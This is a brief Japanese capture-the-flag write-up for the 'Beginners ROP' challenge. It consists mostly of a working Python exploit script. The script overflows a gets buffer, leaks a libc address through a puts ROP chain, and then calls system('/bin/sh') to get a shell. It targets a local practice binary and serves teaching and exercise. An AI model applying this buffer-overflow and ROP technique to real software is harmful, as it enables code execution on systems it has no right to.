# Beginners ROP - Beginners CTF Online 2021

## 概要

gets+puts=自明

## 解法

```python=
from ptrlib import *

# Offsets are read from this exact libc build; the leak below only lines up
# if the target process loads the same library (TODO confirm on the target).
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
elf = ELF("./chall")
sock = Process("./chall")

# Fixed, non-relocated gadget address: the binary appears to be built without
# PIE, otherwise this constant would have to be rebased at runtime -- verify.
rop_pop_rdi = 0x00401283

# Stage 1: call puts(got['puts']) to print the runtime address of puts, then
# return to main so the program reads a second line of input.
# 0x108 bytes of filler precede the chain; presumably the distance from the
# input buffer to the saved return address, which implies no stack canary in
# between -- verify against the binary's protections.
payload = b'A' * 0x108
payload += flat([
    rop_pop_rdi,
    elf.got('puts'),
    elf.plt('puts'),
    elf.symbol('main')
], map=p64)
sock.sendline(payload)

# The first line is the program's own output and is discarded; the second is
# the leaked pointer. NOTE(review): u64 is applied to the raw line -- assumes
# ptrlib strips the trailing newline and pads short input; confirm.
sock.recvline()
libc_base = u64(sock.recvline()) - libc.symbol('puts')
libc.set_base(libc_base)

# Stage 2: system("/bin/sh") resolved through the rebased libc.
# rop_pop_rdi+1 is presumably a lone `ret` used to keep the stack 16-byte
# aligned before entering system -- verify in the disassembly.
payload = b'A' * 0x108
payload += flat([
    rop_pop_rdi+1,
    rop_pop_rdi,
    next(libc.find('/bin/sh')),
    libc.symbol('system')
], map=p64)
sock.sendline(payload)
sock.interactive()
```

## 感想・意見

- 一番簡単な部類で良いと思う